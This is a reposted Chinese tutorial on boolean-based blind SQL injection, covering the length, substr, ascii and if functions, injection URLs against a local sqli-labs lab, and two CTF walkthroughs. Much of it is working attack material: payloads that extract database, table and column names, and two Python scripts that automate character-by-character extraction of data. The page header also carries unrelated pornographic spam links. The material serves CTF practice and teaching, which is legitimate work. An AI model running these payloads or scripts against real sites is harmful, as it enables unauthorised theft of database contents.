日本免费高清视频-国产福利视频导航-黄色在线播放国产-天天操天天操天天操天天操|www.shdianci.com

學無先后,達者為師

網站首頁 編程語言 正文

python?布爾注入原理及滲透過程示例_python

作者:XINO ? 更新時間: 2022-11-26 編程語言

引文

之前有一篇文章給大家帶來了SQL注入的基本知識點以及分類,包含的面比較廣但是不深入,于是我準備詳細講講每一種類型的SQL注入的詳細利用方法以及場景,今天給大家帶來的是布爾盲注,也是比較常用的一種注入方式。

基本知識

什么是布爾注入?

先了解一下什么是布爾盲注,在平常我們在網頁輸入SQL語句網頁會給我們關于SQL語句的回顯,比如SQL錯報信息,我們根據這些錯報信息去進行SQL注入,但你們有沒有想過,如果當我們傳入語句網站不會給我們回顯時,我們該怎么辦呢,這時我們引入布爾注入的概念,即通過一些判斷語句來確認數據庫的內部信息,可以看看下面的圖:

有回顯

無回顯

下面就告訴大家如何在只有兩種回顯的頁面,利用函數來實現我們的布爾盲注。

函數

下面給大家舉例一下布爾盲注中常用的函數以及他們的作用:

length(str):返回str字符串的長度。

substr(str, pos, len):將str從pos位置開始截取len長度的字符進 行返回。注意這里的pos位置是從1開始的,不是數組的0開始

mid(str,pos,len):跟上面的一樣,截取字符串

ascii(str):返回字符串str的最左面字符的ASCII代碼值。

ord(str):同上,返回ascii碼

if(a,b,c) :a為條件,a為true,返回b,否則返回c,如if(1>2,1,0),返回0

當然這只是最常見的函數,當上面這些被禁用時,我們可以尋找其他的函數,下面給大家舉例如何利用這些函數。

根據布爾型的規則,網頁只給我們返回TRUE或者FALSE,那么我們像下面這樣進行傳參:

http://127.0.0.1/Less-8/?id=1'and (length(database()))>8 --+

判斷數據庫名字長度是否大于8,正確返回TRUE,錯誤返回FALSE。

注入過程

假如我們已經判斷完數據庫的名字長度,接下來就來猜測數據庫的第一個字母是什么:

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1'and ascii(substr(database(),1,1))>110#

我們可以根據二分法來進行判斷,當我們ASCII為110返回為TRUE,111時為FALSE,我們就可以判斷ASCII碼為110對應的字符為數據庫的第一個名稱。關于ASCII對應的值可以參考下面的圖:

同理我們修改匹配的數據庫字段來查詢第二個字符:

substr(database(),2,1)

查詢出數據庫的名字為security后我們按順序查詢表名的第一個字母:

1' and (ascii(substr((select table_name from information_schema.tables
 where table_schema=''security limit 0,1),1,1)))>100 --+

最后得到表名為emails,于是我們查詢字段值的第一個字母:

1' and (ascii(substr((select column_name from information_schema.columns
 where table_name='emails'),1,1)))>100 --+

最后得到字段值。

大家有沒有發現如果我們一個一個的試時間成本是不是很大,于是我們可以編寫腳本來自動循環跑出來。下面會給大家帶來例題。

例題

例題一

給了我們一個搜索框:

我們嘗試輸入后發現,輸入1回顯Hello, glzjin wants a girlfriend,輸入2回顯Do you want to be my girlfriend?,輸入大于2的數回顯:Error Occured When Fetch Result,而且還會檢測我們語句過濾了union等關鍵字,但是沒有過濾(),考慮布爾盲注。嘗試構造PAYLOAD:

id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))

回顯正常,可以進行SQL注入,我們利用腳本:

import requests
import time
import re
url='http://4f098f39-88d5-4922-afcc-06e3cfa8ac6e.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
    max = 127
    min = 0
    for c in range(0,127):
        s = (int)((max+min)/2)
        payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(0.005)
        if 'Hello, glzjin wants a girlfriend.' in str(r.content):
            min=s
        else:
            max=s
        if((max-min)<=1):
            flag+=chr(max)
            print(flag)
            break

運行得到FLAG:

例題二

也是一個搜索框,我們分別輸入1和1',得到以下回顯:

猜測是布爾注入,我們先查詢數據庫長度:

1 and length(database()) >5

得到數據庫長度為4后,我們查詢數據庫名字:

1 and ascii(substr(database(),1,1))=115

得到庫名為sqli,接下來就是查詢表和字段等操作了,在網上找了一個腳本來讓他自己跑:

import requests
# 爆庫
def dataBaseName(url, mark):
    name = ''
    for i in range(1, 9):
        for j in "sqcwertyuioplkjhgfdazxvbnm":
            payload = url + "if(substr(database(),%d,1)='%s',1,0)" % (i, j)
            r = requests.get(payload)
            if mark in r.text:
                name = name + j
                print(name)
                break   
    print('數據庫名:', name)
# 爆表
def table_name(url,mark):
    tableList = []
    for i in range(0,4):
        name = ''
        for j in range(1,9):
            for k in 'sqcwertyuioplkjhgfdazxvbnm':
                payload = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    name = name + k
                    print(name)
                    break
        tableList.append(name)
    print('table_name:',tableList)
# 爆字段
def column_name(url,mark):
    columnList = []
    for i in range(0,3):
        columnName = ''
        for j in range(1,9):
            for k in 'sqcwertyuioplkjhgfdazxvbnm':
                payload = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema = database() limit %d,1),%d,1)="%s",1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    columnName += k
                    print(columnName)
                    break
        columnList.append(columnName)
    print("字段名:",columnList)
# 爆字段第一個行內容
def get_data(url,mark):
    data = ''
    for i in range(1,50):
        for j in range(48,126):
            payload = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,0)' %(i,j)
            r = requests.get(payload)
            if mark in r.text:
                data += chr(j)
                print(data)
                break
    print("字段第一個值",data)
# 爆字段前10行內容
def get_data(url,mark):
    dataList = []
    for i in range(1,10):
        data = ''
        for j in range(1,50):
            for k in range(48,126):
                payload = url + 'if(ASCII(SUBSTR((SELECT flag FROM `flag` limit %d,1),%d,1))=%d,1,0)' %(i,j,k)
                r = requests.get(payload)
                if mark in r.text:
                    data += chr(k)
                    print(data)
                    break
        dataList.append(data)
    print("字段前10行內容",dataList)
if __name__ == "__main__":
    url = "/?id="
    mark = "query_success"
    dataBaseName(url, mark)
    table_name(url, mark)
    column_name(url, mark)
    get_data(url,mark)

結語

原文鏈接:https://juejin.cn/post/7155618397361799205

欄目分類
最近更新